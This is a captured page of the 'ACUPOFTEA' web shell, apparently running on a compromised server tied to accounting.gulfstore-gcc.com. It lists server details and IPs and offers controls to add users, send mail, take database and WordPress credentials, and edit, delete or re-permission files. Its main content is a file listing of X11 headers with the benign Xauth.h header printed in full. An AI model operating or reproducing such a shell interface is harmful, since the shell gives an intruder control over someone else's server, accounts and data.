System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
X11
/
216.73.216.141
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
Xauth.h
/* Copyright 1988, 1998 The Open Group Permission to use, copy, modify, distribute, and sell this software and its documentation for any purpose is hereby granted without fee, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation. The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE OPEN GROUP BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Except as contained in this notice, the name of The Open Group shall not be used in advertising or otherwise to promote the sale, use or other dealings in this Software without prior written authorization from The Open Group. */ #ifndef _Xauth_h #define _Xauth_h /* struct xauth is full of implicit padding to properly align the pointers after the length fields. We can't clean that up without breaking ABI, so tell clang not to bother complaining about it. */ #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Wpadded" #endif typedef struct xauth { unsigned short family; unsigned short address_length; char *address; unsigned short number_length; char *number; unsigned short name_length; char *name; unsigned short data_length; char *data; } Xauth; #ifdef __clang__ #pragma clang diagnostic pop #endif #ifndef _XAUTH_STRUCT_ONLY # include <X11/Xfuncproto.h> # include <X11/Xfuncs.h> # include <stdio.h> # define FamilyLocal (256) /* not part of X standard (i.e. X.h) */ # define FamilyWild (65535) # define FamilyNetname (254) /* not part of X standard */ # define FamilyKrb5Principal (253) /* Kerberos 5 principal name */ # define FamilyLocalHost (252) /* for local non-net authentication */ _XFUNCPROTOBEGIN char *XauFileName(void); Xauth *XauReadAuth( FILE* /* auth_file */ ); int XauLockAuth( _Xconst char* /* file_name */, int /* retries */, int /* timeout */, long /* dead */ ); int XauUnlockAuth( _Xconst char* /* file_name */ ); int XauWriteAuth( FILE* /* auth_file */, Xauth* /* auth */ ); Xauth *XauGetAuthByAddr( #if NeedWidePrototypes unsigned int /* family */, unsigned int /* address_length */, #else unsigned short /* family */, unsigned short /* address_length */, #endif _Xconst char* /* address */, #if NeedWidePrototypes unsigned int /* number_length */, #else unsigned short /* number_length */, #endif _Xconst char* /* number */, #if NeedWidePrototypes unsigned int /* name_length */, #else unsigned short /* name_length */, #endif _Xconst char* /* name */ ); Xauth *XauGetBestAuthByAddr( #if NeedWidePrototypes unsigned int /* family */, unsigned int /* address_length */, #else unsigned short /* family */, unsigned short /* address_length */, #endif _Xconst char* /* address */, #if NeedWidePrototypes unsigned int /* number_length */, #else unsigned short /* number_length */, #endif _Xconst char* /* number */, int /* types_length */, char** /* type_names */, _Xconst int* /* type_lengths */ ); void XauDisposeAuth( Xauth* /* auth */ ); _XFUNCPROTOEND /* Return values from XauLockAuth */ # define LOCK_SUCCESS 0 /* lock succeeded */ # define LOCK_ERROR 1 /* lock unexpectely failed, check errno */ # define LOCK_TIMEOUT 2 /* lock failed, timeouts expired */ #endif /* _XAUTH_STRUCT_ONLY */ #endif /* _Xauth_h */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-09-25 10:58:45
..
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
dri
DIR
-
drwxr-xr-x
2024-03-13 04:59:05
extensions
DIR
-
drwxr-xr-x
2024-03-13 04:59:05
fonts
DIR
-
drwxr-xr-x
2024-03-13 04:59:05
DECkeysym.h
text/plain
2.75 KB
-rw-r--r--
2020-04-14 03:29:25
HPkeysym.h
text/x-c
5.9 KB
-rw-r--r--
2020-04-14 03:29:25
ImUtil.h
text/x-c
459 B
-rw-r--r--
2019-06-17 02:47:35
Sunkeysym.h
text/plain
3.93 KB
-rw-r--r--
2020-04-14 03:29:25
X.h
text/x-c
19.67 KB
-rw-r--r--
2020-04-14 03:29:25
XF86keysym.h
text/plain
13.29 KB
-rw-r--r--
2020-04-14 03:29:25
XKBlib.h
text/x-c
30.27 KB
-rw-r--r--
2019-06-17 02:47:35
XWDFile.h
text/x-c
3.78 KB
-rw-r--r--
2020-04-14 03:29:25
Xalloca.h
text/x-c
4.48 KB
-rw-r--r--
2020-04-14 03:29:25
Xarch.h
text/x-c
2.88 KB
-rw-r--r--
2020-04-14 03:29:25
Xatom.h
text/x-c
2.46 KB
-rw-r--r--
2020-04-14 03:29:25
Xauth.h
text/x-c
3.73 KB
-rw-r--r--
2019-02-10 10:45:00
Xcms.h
text/x-c
20.85 KB
-rw-r--r--
2019-06-17 02:47:35
Xdefs.h
text/x-c
2.34 KB
-rw-r--r--
2020-04-14 03:29:25
Xfuncproto.h
text/x-c
7.68 KB
-rw-r--r--
2020-04-14 03:29:25
Xfuncs.h
text/x-c
2.2 KB
-rw-r--r--
2020-04-14 03:29:25
Xlib-xcb.h
text/x-c
506 B
-rw-r--r--
2019-06-17 02:47:35
Xlib.h
text/x-c
97.2 KB
-rw-r--r--
2019-06-17 02:47:35
XlibConf.h
text/x-c
1.53 KB
-rw-r--r--
2024-09-24 02:41:12
Xlibint.h
text/x-c
39.56 KB
-rw-r--r--
2024-09-24 02:41:00
Xlocale.h
text/x-c
1.27 KB
-rw-r--r--
2019-06-17 02:47:35
Xmd.h
text/x-c
5 KB
-rw-r--r--
2020-04-14 03:29:25
Xos.h
text/x-c
4.26 KB
-rw-r--r--
2020-04-14 03:29:25
Xos_r.h
text/x-c
32.9 KB
-rw-r--r--
2020-04-14 03:29:25
Xosdefs.h
text/x-c
3.04 KB
-rw-r--r--
2020-04-14 03:29:25
Xpoll.h
text/x-c
7.56 KB
-rw-r--r--
2020-08-18 10:42:49
Xproto.h
text/x-c
51.17 KB
-rw-r--r--
2020-04-14 03:29:25
Xprotostr.h
text/x-c
2.68 KB
-rw-r--r--
2020-04-14 03:29:25
Xregion.h
text/x-c
5.81 KB
-rw-r--r--
2019-06-17 02:47:35
Xresource.h
text/x-c
10.38 KB
-rw-r--r--
2019-06-17 02:47:35
Xthreads.h
text/x-c
12.1 KB
-rw-r--r--
2020-04-14 03:29:25
Xutil.h
text/x-c
20.85 KB
-rw-r--r--
2019-06-17 02:47:35
Xw32defs.h
text/x-c
1.86 KB
-rw-r--r--
2020-04-14 03:29:25
Xwindows.h
text/x-c
3.21 KB
-rw-r--r--
2020-04-14 03:29:25
Xwinsock.h
text/x-c
2.21 KB
-rw-r--r--
2020-04-14 03:29:25
ap_keysym.h
text/plain
2.24 KB
-rw-r--r--
2020-04-14 03:29:25
cursorfont.h
text/x-c
3.04 KB
-rw-r--r--
2019-06-17 02:47:35
keysym.h
text/x-c
2.7 KB
-rw-r--r--
2020-04-14 03:29:25
keysymdef.h
text/x-c
171.14 KB
-rw-r--r--
2020-04-14 03:29:25
xpm.h
text/x-c
15.83 KB
-rw-r--r--
2024-03-30 01:53:16
~ ACUPOFTEA - accounting.gulfstore-gcc.com